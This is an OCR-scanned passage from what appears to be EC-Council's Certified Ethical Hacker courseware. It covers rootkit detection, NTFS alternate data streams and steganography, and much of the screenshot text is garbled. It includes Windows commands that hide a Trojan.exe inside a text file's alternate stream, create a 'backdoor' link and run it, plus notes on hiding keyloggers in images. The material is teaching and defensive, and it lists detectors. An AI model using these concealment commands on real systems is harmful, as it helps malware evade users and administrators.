—_C-\Windows\system32\ntoskinl. exe[KDCOM .dillKdD3T ransition)

IAT

—_C:\Windows\system32\ntoskinl. exe[KDCOM.dliikdSendPacket)

IAT

IAT

IAT IAT IAT

[fffff80000b9b840} \SystemRoot\system32\kdcom dil [text]

—_C-\Windows\system32\ntoskml exe[KDCOM dil dDOTransition) —_C:\Windows\system32\ntoskml exe[KDCOM dll dReceivePacket]

{tifff80000b9bS18} \SystemRoot\system32\kdcom.dil [.text]

C:\Windows \system32\ntoskmnL.exe[KDCOM.dilKdRiestore]

Iff80000b990c} \SystemRoot\system@2\kdcom.l [text] [ffiff0000b9b900] \SystemRoot\system32\kdcom.dll [text]

—_ C:\Windows\system32\ntoskinl exe[KDCOM dillKdSave]

—_C\Windows\system@2\ntoskinl exelKDCOM alk dDebuggerinisize0] —_C-\Windows\system32\ntoskinl. exe[KDCOM.dlllKdDebuggertnitialize1) C:AWindows\system32\hal.dllKDCOM. dlKdRestore]

IAT

C:\Windows\system32\kdcom.difntoskml exelatol)

IAT

—_C:\Windows\system32\kdcom.difntoskinl exelinbyDisplayS|

IAT

IAT

IAT

IAT IAT IAT

IAT

Devi. Devi...

C\Windowe\epstem2\kdcom ditoskirewelKeFindConf CAWindows\syst dfnt exe! MmMaplo

I

Sewices Bee

WARNING !!

ebuoged dD lK C:AWindows\system32\kdcom dilntoskml exe

GMER has found system modification caused by ROOTKIT activity.

C:\Windows \system32\kdcom dlfHAL dllKComPortinLse]

OK

WF Fis

\Driver\atapi \Device\ide\IdeDevicePOTOLO-0 \Driver\atapi > DriverStartlo \Device\Ide\idePort0

Tffeo00T E64 iifas001 564480 ‘Hiffa8001 564480 fifseo0T 64480

Vde\deP Device Devi. \Dinve\stpi > DiverS ort tat lo Devi. \Dine\atapt > DiverStatlo \Devce\de\deDeviceP1TOLO.2 \Driver\atapi > DriverStartlo \Device\ScsiPort0 Devi... Devi. \Ditve\stpi > Diverstatlo \Device\SesPot Trace Trace Trace

{ffffa800156d5c0 _ntoskinl.exe CLASSPNP.SYS disk.sys >UNKNOWN [Oxfftffa8001 56d6c0}c< {lffa8001 354730 1 nttlofCallDriver -> \Device\HarddiskO\DRO[Oxtffffa8001 354790) 3 CLASSPNP.SYS|fff#f88001 904431] > ntllofCallDriver > \Device\Ide\ideDevicePOTOLO-O(0.._fffffa80012ba680

Trace \Driver\atepi{Oxftia800158be70] > IRP_MJ_CREATE -> Oniif2800156d6c0

ffa8001 56d6c0

Disk — \Device\HarddiskO\DRO-

‘sector 0: rootkitlike behavior

TOLA@MBR code has been found

Disk \Devioe\HarddskO\DRO

GMER 2.0.18323

| WINDOWS

6.1.7600

Trace I/O.

Modules

© Ubraties

oskinlSp em32\kdcom CAWindowe\system32\kdcom dlfntoskmnLexel_strup]

CAWindone\eystema2\kdcom dock enlstsh —_C:\Windows\system32\kdcom. dijntoskinl exelKeBugChect CWindowe\ejstem2\kdcom eMHAL dH uereal in

I

[ttfte0000b98e4] \SystemRoot\systemB2\kdcom di [ex!] FF Processes {tifff80000b9b8t0) \SystemRoot\system32\kdcom dil [text] md [itit80000b9680c] \SystemRoot\system@2%kdeom di [text] ¥ Threads

IAT — CAWindows\system32\kdcom. diintoskml exelHalPrivateDi

IAT

[¥ Sections

x64

oc.

ick soon

aps

rE =a] Copy

=n

Exit

Figure 6.157: Screenshot of anti-rootkit GMER

A few more important anti-rootkits are listed as follows. =

Stinger (https://www.mcafee.com)

=

Avast One (https://www.avast.com)

=

TDSSKiller (https://usa.kaspersky.com)

=

Malwarebytes Anti-Rootkit (https://www.malwarebytes.com)

=

Rootkit Buster (http://www.trendmicro.co.in)

Module 06 Page 830

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

NTFS Data Stream

|

Inject malicious the e Hacker

NTFS Alternate Data Stream

(ADS) is a Windows hidden stream, which contains metadata for the file, such as

attributes, word count, author

name and access, and modification time of the files

Existing File

NTFS File System

ADS can fork data into existing files without changing or altering their

ADS allows an attackerto inject malicious code in files on an accessible

displayto file browsing

without being detected by the user

functionality, size, or

system and execute them

utilities

NTFS Data Stream NTFS is a filesystem that stores a file with the help of two data streams, along with the file attributes. The first data stream stores the file to be stored, such as permissions, and the second stores the another type of named data stream that can be present within each

streams, called NTFS data the security descriptor for data within a file. ADSs are file.

Alternate Stream

Alternate Stream

Alternate Stream Figure 6.158: NTFS data streams

An ADS refers to any type of data attached to a file, but not in the file on an NTFS system. master file table of the partition contains a list of all the data streams that a file contains their physical locations on the disk. Therefore, ADSs are not present in the file but attached through the file table. NTFS ADS is a Windows hidden stream that contains metadata for

Module 06 Page 831

The and to it the

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking file, such

Exam 312-50 Certified Ethical Hacker

as attributes, word

count, author name,

and access and

modification times of the

files. ADSs can fork data into existing files without changing or altering their functionality, size, or display to file-browsing utilities. They allow an attacker to inject malicious code into files on an accessible system and execute them without being detected by the user. ADSs provide attackers with a method of hiding rootkits or hacker tools on a breached system and allow a user to execute them while hiding from the system administrator. Inject malicious code in the existing

er

-

file

Hacker

Existing File

NTFS File System

Figure 6.159: Hiding files using NTFS data streams

Files with

ADS

are impossible

command

line or Windows

to detect

using native

file-browsing techniques

as the

Explorer. After an ADS file is attached to the original file, the size of

the original file does not change. The only indication modification timestamp, which can be innocuous.

Module 06 Page 832

such

that

the

file was

changed

is the

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

How to Create NTFS Streams

CE H

Notepad is stream compliant application Step 1

Step 2

Step 3

Step 4

@

Launchc:\>notepad

myfile.txt:lion.txt

®

Launchc:\>notepad

myfile.txt:tiger.txt

‘ ; ' 7 enter some data and Save the file © Click ‘Yes’ to create the new file,

F . enter some data and Save the file © Click ‘Yes’ to create the new file,

© Viewthe file size of myfile. txt (It shouldbe zero) © To view or modify the stream data hidden in step 1 and 2, use the following commands respectively: notepad

myfile.txt:lion.txt

notepad myfile.txt:tiger.txt

How to Create NTFS Streams Using NTFS data streams, an attacker can almost completely hide files within a system. It is easy to use the streams, but the user can only identify it with specific software. Explorer can display only the root files; it cannot view the streams linked to the root files and cannot define the disk space used by the streams. As such, if a virus implants itself into ADS, it is unlikely that standard

security software will identify it. When the user reads or writes a file, it manipulates the main data stream by default. We now explore how to “filename.ext:alternateName”.

create

an

ADS

for

a

file.

ADSs

follow

the

syntax:

Steps to create NTFS Streams:

1.

Launch c:\>notepad myfile.txt:lion.txt and click ‘Yes’ to create the new file, enter some data, and Save the file

2.

Launche:\>notepad myfile.txt:tiger.txt and click ‘Yes’ to create the new file, enter some data, and Save the file

3.

View the file size of myfile. txt (It should be zero)

4. The following commands can be used to view or modify stream data hidden in steps 1 and 2, respectively: notepad

myfile.txt:lion.txt

notepad

myfile.txt:tiger.txt

Note: Notepad is a stream-compliant application. You should not use alternate streams to store critical information. Module 06 Page 833

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

NTFS Stream Manipulation Location c:\ a

‘Trojan.exe (size:

1]

Move the contents of

:

il

34a §

C | EH

2 MB)

XX

“3

Location c:\

Readme.txt (size:0)

To move the contents of Trojan.exe to Readme.txt (stream): C:\>type

2 |

c:\Trojan.exe

To createa link to the Trojan.exe stream inside the Readme.txt file:

C:\>mklink backdoor.exe

3)

> c:\Readme.txt:Trojan.exe

Readme. txt:Trojan.exe

To execute the Trojan.exe inside the Readme.txt (stream), type: C:\>backdoor

NTFS Stream Manipulation You can manipulate doing the following:

=

NTFS streams to hide a malicious file in other files, such as text files, by

Hiding Trojan.exe (malicious program) in Readme.txt (stream): Use the following command to move the contents of Trojan.exe to Readme.txt (stream): c:\>type

c:\Trojan.exe

>c:\Readme.txt:Trojan.exe

The “type” command hides a file in an alternate data stream (ADS) behind an existing file. The colon (:) operator gives the command to create or use ADS.

Location c:\ i

O=0:

ceneeeeeeeeeee a a

Move the contents of

ene te Ree

scseessee>

Trojan.exe (size: 2 MB)

~~

=

Location c:\

Readme.txt (size: 0) Figure 6.160: NTFS stream manipulation

=

Creating a link to the Trojan.exe stream inside the Readme.txt file: After hiding the file Trojan.exe behind the Readme.txt file, you need to create a link to launch the Trojan.exe file from the stream. This creates a shortcut for Trojan.exe in the

stream.

C:\>mklink

Module 06 Page 834

backdoor.exe

Readme.txt:Trojan.exe

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

System Hacking

=

Exam 312-50 Certified Ethical Hacker

Executing the Trojan: Type C:\>backdoor to run the Trojan that you have hidden behind Readme.txt. Here, the backdoor is the shortcut created in the previous step, which on execution installs the Trojan.

Note: Use Notepad to read the hidden file. For example, the command c:\>notepad stream behind the sample.txt file.

Module 06 Page 835

sample.txt:secret.txt

creates the secret.txt

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

How to Defend against NTFS Streams

©

To delete NTFS streams, move the suspected files to the FAT partition

1)

Use a third-party file integrity checker such as Tripwire File Integrity Manager to maintain the integrity of an NTES partition files

©

Use programs such as Stream Detector,or GMER to detect streams

©

Enable real-time antivirus scanning to protect against the execution of malicious streams in the system

©

CE H

Use up-to-date antivirus software on the system Copyright © by

How to Defend against NTFS Streams Perform the following tasks to defend against malicious NTFS streams: To delete hidden NTFS streams, move the suspected files to a File Allocation Table (FAT) partition. Use a third-party file integrity checker such as Tripwire File Integrity maintain the integrity of NTFS partition files against unauthorized ADSs.

Manager

to

Use third-party utilities to show and manipulate hidden streams such as EventSentry SysAdmin Tools or adslist.exe. Avoid writing important or critical data to ADSs. Use up-to-date antivirus software on the system. Enable real-time antivirus streams in the system.

scanning

to

protect

Use file-monitoring software such as Stream

against

the

execution

of malicious

Detector (https://www.novirusthanks.org),

and GMER (http://www.gmer.net) to help detect the creation of additional or new data

streams.

Ensure that the firewall is configured

streams.

properly to defend

against any malicious data

For handling ADS, employ software with backup capabilities such as Symantec Backup Exec.

Monitor the specific permissions attributes. Module 06 Page 836

needed

for reading and writing the NTFS extended

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Use LADS (https://www.aldeid.com) software as a countermeasure for NTFS streams. The latest version of lads.exe is GUI-based, and it reports the existence of ADSs. It searches for either single or multiple streams, reports the presence of ADSs, and provides the full path and length of each ADS found. Other means include copying the cover file to a FAT partition and then moving it back to the NTFS. As FAT does not support ADSs, this technique effectively removes them from the original file.

Module 06 Page 837

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

NTFS Stream Detectors Stream mor

|

Stream Armor discovers hidden Alternate Data

| streams (ADS) and.cleans them completely

Stream Detector

from the system

GMER

ttn:/mgmeret

aanazazazaraee

TL

ADS Manager

‘https://dmitrybrant.com

EQ

RS seanon

8

Streams ‘ees: /docs.microsofcom

NTFS Stream Detectors There are various NTFS stream detectors available on the market. You can detect suspicious streams with the following NTFS stream detectors. You can download and install these stream detectors from their websites.

Module 06 Page 838

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking =

Stream Armor

Source: https://securityxploded.com Stream Armor is a tool used to discover hidden ADSs and clean them completely from your system. Its advanced auto analysis, coupled with an online threat verification mechanism, helps you eradicate any ADSs that may be present. As shown in the screenshot, security professionals use Stream Armor to analyze and detect ADS streams in their systems.

@ stream Armor woo SecurtyXploded.com

=

Perform compete computer scan

"Now scanning: (:isers Vin Wapato Tem Scanned: [13617 faders, 33745 les

e\

soosom || 68 Stream Name l2one.identfier

ceeceeeas

ose ne: [0s 02min sec

uJ

Resits:|

25 to)

Size Stream Content Type 258 TextRle

Threat Analysis Information known Steam Fle

Gi one.tdentiier

268 TextFile

rene. denier Gh2one.ientfier

(Gi zone. identifier

Pp) 2

(Gi zone.tdentifier Gi zone. identifier

Gh zone. identifier

RARE

IESSECSF-5486-4F84-8525-17A7250A36C2 PT

(TISSUE

File Date 21-06-2018

Full Steam File Path C:\nbiscanexe:Zone.dentfier

Known Stream Fle

21-06-2019

__C:\Users\Admin\Downloads|hyena_en_x64

258. TextFe 258. Texte

Known Steam Fle Known Steam Fle

12.05-2019 25-05-2019

C:\sers\Acnn|Downloads avaSetupu2} _C:\sers\Admin\Downioads Wanagengne,

268 258 268 258 258 258 258 258

known Known known oon Known oown Known known

22.07.2019 1206-2019 1402-2011 2202-2003 01-03-2018 10-05-2019 13-06-2016 27-08-2015

C:\Jsers\Adnin|Pownioade\StreamArmor 2) C:sers\Admnn|Downloadsyrcexe:Zone. C:Wsers\dmnn\Donnloads\Sreamicmer\S C:\Jsers\Adrin\Powrioads\nbt_enum_off, _C:\isers\Admin\Pownioads\Bunde-20900-1 C:Wsers\Adnin\Donnloads hyena. en x64 _C:\sers\Adrn|Downloads\StreamArmor\S C:\Jsers\AdminPowrioads\StreamAmeor'S

268 TextFile

Known Stream File

Type Fle

02-07-2019 24-06-2019

Known Stream File Known Stream Fle

268 TextFile 268 Textile

TextFie TextFie TextFle Textile Texte TextFie TextFle TextFie

268 Textile

Steam Steam Steam Steam Stream Steam Stream Steam

Fe Fle Fle Fle Fle Fie Fle Fie

Known Stream Fle

01-03-2003

x

_C:\Users\Admin\Downloads\yibt_enum_off, _C:\Users\Admin\Downloads\Solarwinds-Oric

C:\Users\Admin\Downloads\nibt_enum off, 4

Figure 6.161: Screenshot of Stream Armor.

Some additional examples of NTFS stream detectors are listed as follows:

=

Stream Detector (https://www.novirusthanks.org)

=

GMER (http://www.gmer.net)

=

ADS Manager (https://dmitrybrant.com)

=

ADS Scanner (https://www.pointstone.com)

=

Streams (https://docs.microsoft.com)

Module 06 Page 839

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

What is Steganography?

CE H

Steganography is a technique of hiding a secret message within an ordinary message and extracting it at the destination to maintain confidentiality of data Utilizinga graphic image as a cover is the most popular method to conceal the data in files The attacker can use steganographyto hide messages such as a listof the compromised servers, source code for the hacking tool, or plans for future attacks Cover Medium

a » IPS IA, EC-Council “Hackers

|

wa

VAN a Message to be embedded

i Stego Object

Cover Medium

aa » IPS IA,

“Hackers soe *D> EC-Coundl arehere. Where are Extracted you?” message Copyright © by

What is Steganography? One of the shortcomings of various detection programs is their primary focus on streaming text data. What if an attacker bypasses normal surveillance techniques and still steals or transmits sensitive data? In a typical situation, after an attacker manages to infiltrate a firm as a temporary or contract employee, he/she surreptitiously seeks out sensitive information. While the organization may have a policy that does not allow removable electronic equipment in the facility, a determined attacker can still find ways to circumvent this by using techniques such as steganography. Steganography

refers to the art of hiding data “behind” other data without the knowledge

of

the victim. Thus, steganography hides the existence of a message. It replaces bits of unused

data into ordinary files, such as graphics, sound, text, audio, and video with other surreptitious bits. The hidden data can be in the form of plaintext or ciphertext, and sometimes, an image. Utilizing a graphic image as a cover is the most popular method to conceal the data in files. Unlike encryption, the detection of steganography can be challenging. Thus, steganography techniques are widely used for malicious purposes.

For example, attackers can hide a keylogger inside a legitimate image; thus, when the victim clicks on the image, the keylogger captures the victim’s keystrokes. Attackers also use steganography to hide information when encryption is not feasible. In terms of security, it hides the file in an encrypted format, so that even if the attacker decrypts it, the message will remain hidden. Attackers can insert information such as source code for a hacking tool, a list of compromised servers, plans for future attacks, communication and coordination channels, etc.

Module 06 Page 840

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Cover Medium

Cover Medium

ataa" at Embedding function EC-Council “Hackers are here. Where are you?”

A Message to be embedded

aa a PP

Extracting function EC-Council “Hackers

Stego Object

ssseeeesD> are here, Where are Extracted you?” message

Figure 6.162: Hiding message using steganography

Module 06 Page 841

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Classification of Steganography

CE H

Steganography

° Vv

Technical Steganography

Vv.

Linguistic Steganography

Semagrams

e

Visual Semagrams

/}

{ QZ Covered Ciphers

TextSemagrams

Q/)

| W/

Classification of Steganography Based on its technique, steganography can be classified into two areas: technical and linguistic. In technical steganography, a message is hidden using scientific methods, whereas in linguistic steganography, it is hidden in a carrier, which is the medium used to communicate or transfer messages or files. This medium comprises of the hidden message, carrier, and steganography key. The following diagram depicts the classification of steganography. Steganography

Text Semagrams

VV}

VV

e

e

Jargon Code

Figure 6.163: Classification of steganography

Module 06 Page 842

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Technical Steganography Technical steganography uses physical or chemical methods, including invisible ink, microdots, and other means, to hide the existence of a message. It is difficult to categorize all the methods by which these goals are achieved, but some examples can be listed as follows: Invisible Ink Invisible ink, or “security ink,” is one of the methods of technical steganography. It is used for invisible writing with colorless liquids and can later be made visible by certain pre-negotiated manipulations such as lighting or heating. For example, if you use onion juice and milk to write a message, the writing will be invisible, but when heat is applied to the writing, it turns brown and the message therefore becomes visible.

Applications of invisible ink are as follows: o

Espionage

o

Anti-counterfeiting

©

Property marking

o

Hand stamping for venue readmission

o

Identification marking in manufacturing

Microdots A microdot is a text or an image reverse microscope), fitting up to unintended recipients. Microdots diameter but can be converted into

considerably condensed in size (with the help of a one page in a single dot, to avoid detection by are usually circular and about one millimeter in different shapes and sizes.

Computer-Based Methods

A computer-based method makes changes to digital carriers to embed information foreign to the native carriers. Communication of such information occurs in the form of text, binary files, disk and storage devices, and network traffic and protocols. It can alter software, speech, pictures, videos, or any other digitally represented code for transmission. Computer-based Steganography Techniques Based on the cover modifications applied in the embedding process, techniques can be classified into six groups, which are as follows: o

steganography

Substitution Techniques: In this technique, the attacker tries to encode secret information by substituting the insignificant bits with the secret message. If the receiver knows the places where the attacker embeds secret information, then he/she can extract the secret message.

o

Transform Domain Techniques: The transform domain technique hides the information in significant parts of the cover image, such as cropping, compression, and some other image processing areas. This makes it more difficult to carry out

Module 06 Page 843

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

System Hacking

Exam 312-50 Certified Ethical Hacker

attacks. One can apply the transformations to blocks of images or over the entire image. Spread Spectrum Techniques: This technique is less susceptible to interception and jamming. In this technique, communication signals occupy more bandwidth than required to send the information. The sender increases the band spread by means of code (independent of data), and the receiver uses a synchronized reception with the code to recover the information from the spread spectrum data. Statistical Techniques: This technique utilizes the existence of “1-bit” steganography schemes by modifying the cover in such a way that, when transmission of a “1” occurs, some of the statistical characteristics change significantly. In other cases, the cover remains unchanged, to distinguish between the modified and unmodified covers. The theory of hypothesis from mathematical statistics helps in extraction. Distortion Techniques: In this technique, the user implements a sequence of modifications to the cover to obtain a stego-object. The sequence of modifications represents the transformation of a specific message. The decoding process in this technique requires knowledge about the original cover. The receiver of the message can measure the differences between the original cover and the received cover to reconstruct the sequence of modifications. Cover Generation Techniques: In this technique, digital objects are developed specifically to cover secret communication. When this information is encoded, it ensures the creation of a cover for secret communication. Linguistic Steganography

This type of steganography hides the message in the carrier of another classification of linguistic steganography includes semagrams and open codes.

file.

Further

Semagrams Semagrams involve a steganography technique that hides information with the help of signs or symbols. In this technique, the user embeds some objects or symbols in the data to change the appearance of the data to a predetermined meaning. The classification of semagrams is as follows: o

Visual Semagrams: This technique hides information in a drawing, painting, letter, music, or a symbol.

o

Text Semagrams: A text semagram hides the text message by converting or transforming the appearance of the carrier text message, such as by changing font sizes and styles, adding extra spaces as whitespaces in the document, and including different flourishes in letters or handwritten text.

Open Codes Open code hides the secret message in a legitimate carrier message specifically designed in a pattern on a document that is unclear to the average reader. The carrier message is sometimes also known as the overt communication, and the secret message Module 06 Page 844

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

as the covert communication. The open-code technique consists of two main groups: jargon codes and covered ciphers. o

Jargon Codes: In this type of steganography, a certain language is used that can be understood by the particular group of people to whom it is addressed, while being meaningless to others. A jargon message is like a substitution cipher in many respects, but instead of replacing individual letters, the words themselves are changed. An example of a jargon code is “cue” code. A cue is a word that appears in the text and then transports the message.

o

Covered Ciphers: This technique hides the message in a carrier medium visible to everyone. This type of message can be extracted by any person with knowledge of the method used to hide it. Further classification of cover ciphers includes null ciphers and grille ciphers. e

Null ciphers: A technique used to hide the message within a large amount of useless data. The original data are mixed with the unused data in any order horizontally, diagonally, vertically, or in reverse so that no one can understand it other than those who know the order.

¢

Grille ciphers: A technique used to encrypt plaintext by writing it onto a sheet of paper through a pierced (or stenciled) sheet of paper, cardboard, or any other similar material. In this technique, one can decipher the message using an identical grille. This system is thus difficult to crack and decipher, as only someone with the correct grille will be able to decipher the hidden message.

Module 06 Page 845

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Types of Steganography based on Cover Medium

if | EH

EE

ce steganography

Ey

web steganography

|2 |

Document Steganography

| 3 |

Spam/Email Steganography

Eh

folder steganography

EE

sovo-nom steganography

FE

viseo steganography

FE]

natural text steganography

Eh

rusio steganography

FEY

tissen os steganography

EE

mnie space steganography

FE

c++ Source-code steganography $s Reserved. Reproduction

Steganography Tools

CE H

Whitespace Steganography

Sht one Data Hiding

Fy Leonel s

erecta

Image Steganography

a

x ||| @swssa

‘Hide data in harmless looking files

a

feadie Hiding ere ete Using | [tM (Ceara Help Goes

[C:sers'Acmntrator Desktop Document. tt

= (Aa vant eerie ro

(Gat ms fer provi nad) te ented came menage hack es)

ean, re oe

a npn gn avert =

esi

zi co

-

x

SEES

Destpgecet watt

Cover Fle

(Peta) | ous siege Fie Protal watermarking

SF

Document Steganography

[chen ontinde

es " veneers

=

= tome

Enter Password

ps:/punn opestego.com

htps://sourceforge ne

Types of Steganography based on Cover Medium Steganography is the art and science of writing hidden messages in such a way that no one other than the intended recipient knows of the existence of the message. The increasing use of electronic file formats with new technologies has made data hiding possible. Basic steganography can be broken down into two areas: data hiding and document making. Document making deals with protection against removal. Its further classifications of cover medium include watermarking and fingerprinting. Module 06 Page 846

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

The different types of steganography are as follows:

Image Steganography Document steganography Folder Steganography Video Steganography Audio Steganography Whitespace Steganography Web Steganography Spam/Email Steganography DVD-ROM Steganography Natural Text Steganography Hidden OS Steganography C++ Source-Code Steganography

Whitespace Steganography Whitespace steganography is used to conceal messages in ASCII text by adding whitespaces to the ends of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If built-in encryption is used, the message cannot be read even if it is detected.

Snow Source: http://www.darkside.com.au Snow is a program for concealing messages in text files by appending tabs and spaces to the ends of lines, and for extracting messages from files containing hidden messages. The user hides the data in the text file by appending sequences of up to seven spaces, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent Os and 1s. However, users rejected it because it uses fewer bytes but requires more columns per bit (4.5 vs. 2.67). An appended tab character is an indication of the start of the data, which allows the insertion of mail and news headers without corrupting the data. As shown in the screenshot, attackers use the Snow tool to hide messages in a text file using the following command: Syntax: snow [ -CQS ] [ -p passwd ] [ -I line-len ] [ -f file | -m message ] [ infile [ outfile ]]

Options:

o

-C: Compress the data if concealing, or uncompress it if extracting.

Module 06 Page 847

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

o

-Q: Quiet mode. If not set, the program reports statistics percentages and the amount of available storage space used.

o

-S: Report on the approximate amount of space available for a hidden message in the text file. Line length is valid but ignore other options.

©

-p password: If this is set, data encryption concealment, or decryption during extraction.

o

-Iline-length: When appending whitespaces, Snow will always produce lines shorter than this value. By default, the line length is 80.

o.

-f message-file: The input text file will hide the contents of this file.

oO

-mmessage-string: The input text file will hide the contents of this string. Note that, unless a new line is somehow included in the string, it will not appear in the extracted message.

occurs

with

such

this

as compression

password

during

{BH Command Prompt

Figure 6.164: Screenshot of Snow

Image Steganography Images are the most popular cover objects used for steganography. Image steganography allows you to conceal your secret message within an image. You can exploit the redundant bits of the image to conceal your message within it. These redundant bits are those parts of the image that have very little effect on it if altered. The detection of this alteration is not easy. You can conceal your information within images of different formats (e.g., .PNG, JPG, .BMP). Images are popular “cover objects” used for steganography by replacing redundant bits of image data with the message, in such a way that human eyes cannot detect the effect. Image steganography is classified into two types: image domain and transform domain. In image domain (spatial) techniques, a user embeds the messages directly in the intensity of the pixels. In transformdomain (frequency) techniques, first, the transformation of images occurs; then the user embeds the message in the image. The following figure depicts the image steganography tools in the process.

Module 06 Page 848

process and the role of steganography

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

, -

q--->A4 aS = Steganography Stego Tool Image

Steganography Tool

Information

:

ms

ae

©

Cover Image

Information

Figure 6.165: Image steganography process

Image File Steganography Techniques =

Least-Significant-Bit Insertion

The least-significant-bit insertion technique is the most commonly used technique of image steganography, in which the least significant bit (LSB) of each pixel helps hold secret data. The LSB is the rightmost bit of each pixel of an image. In the LSB insertion method, the binary data of the message are broken up and inserted into the LSB of each pixel in the image file in a deterministic sequence. Modifying the LSB does not result in a visible difference because the net change is minimal and can be indiscernible to the human eye. Thus, its detection is difficult.

Hiding the data: o

The stego tool makes a copy of an image palette with the help of the red, green, and blue (RGB) model

o

Each pixel of the 8-bit binary number LSB is substituted with one bit of the hidden

o

Anew RGB color in the copied palette is produced

o

With the new RGB color, the pixel is changed to an 8-bit binary number

message

Suppose you have chosen a 24-bit image represent in digital form, as follows: (00100111 11101001 00100111 11101001)

11001000)

to hide your

(00100111

secret

11001000

data, which

11101001)

you

can

(11001000

Suppose you want to hide the letter “H” in the above 24-bit image. The system represents the letter “H” by binary digits 01001000. To hide this “H,” you can change the previous stream to: (00100110

11101001

11001000)

(00100110

11001001

11101000)

(11001000

00100110

11101001)

01001000 Figure 6.166: Example of LSB insertion

Module 06 Page 849

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

You just need to replace the LSB of each pixel of the image file, as shown in the figure. To retrieve this H at the other side, the recipient combines all the LSB image bits and is thus able to detect the H. =

Masking and Filtering Masking and filtering techniques exploit the limitations of human vision, which is incapable of detecting slight changes in images. Grayscale images and digital watermarks can hide information in a way similar to that of watermarks on paper. Masking allows you to conceal secret data by placing the data in an image file. You can use masking and filtering techniques on 24-bit-per-pixel and grayscale images. To hide secret messages, you must adjust the luminosity and opacity of the image. If the change in luminance is insignificant, then people other than the intended recipients will fail to notice that the image contains a hidden message. This technique can be easily applied as the image remains undisturbed. In most cases, users perform masking of JPEG images. Lossy JPEG images are relatively immune to cropping and compression image operations. Hence, you can hide your information in lossy JPEG images, often using the masking technique. If a message hides in significant areas of the picture, the steganography image encoded with a marking degrades at a lower rate under JPEG compression.

Masking techniques can be detected with simple statistical analysis but are resistant to lossy compression and image cropping. The information is not hidden in the noise but in the significant areas of the image. =

Algorithms and Transformation The algorithms and transformation technique involves hiding secret information during image compression. In this technique, the user conceals the information by applying various compression algorithms and transformation functions. A compression algorithm and transformation uses a mathematical function to hide the coefficient of the least bit during image compression. The data are embedded in the cover image by changing the coefficients of a transformation of an image. Generally, JPEG images are the most suitable for compression, as they can function at different compression levels. This technique provides a high level of invisibility of secret data. JPEG images use a discrete cosine transform to achieve compression.

There are three types of transformation used in the compression algorithm: o

Fast Fourier transformation

o

Discrete cosine transformation

o

Wavelet transformation

If the user embeds the information in the spatial domain of the LSB insertion technique,

information hidden in the images can be vulnerable to attacks. An attacker can utilize simple signal-processing techniques and damage the information hidden in the image when using the LSB insertion technique. This may refer to the loss of information when the image undergoes certain processing techniques like compression. To overcome Module 06 Page 850

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

these problems, one can hide the information with frequency-domain-based techniques such

as

fast

Fourier

transformation,

discrete

cosine

transformation,

or

wavelet

transformation. Digital data are not continuous in the frequency domain. Analysis of the image data, to which frequency domain transformations are applied, becomes

extremely challenging, which renders cryptanalysis attacks difficult to be performed. Image Steganography Tools =

OpenStego

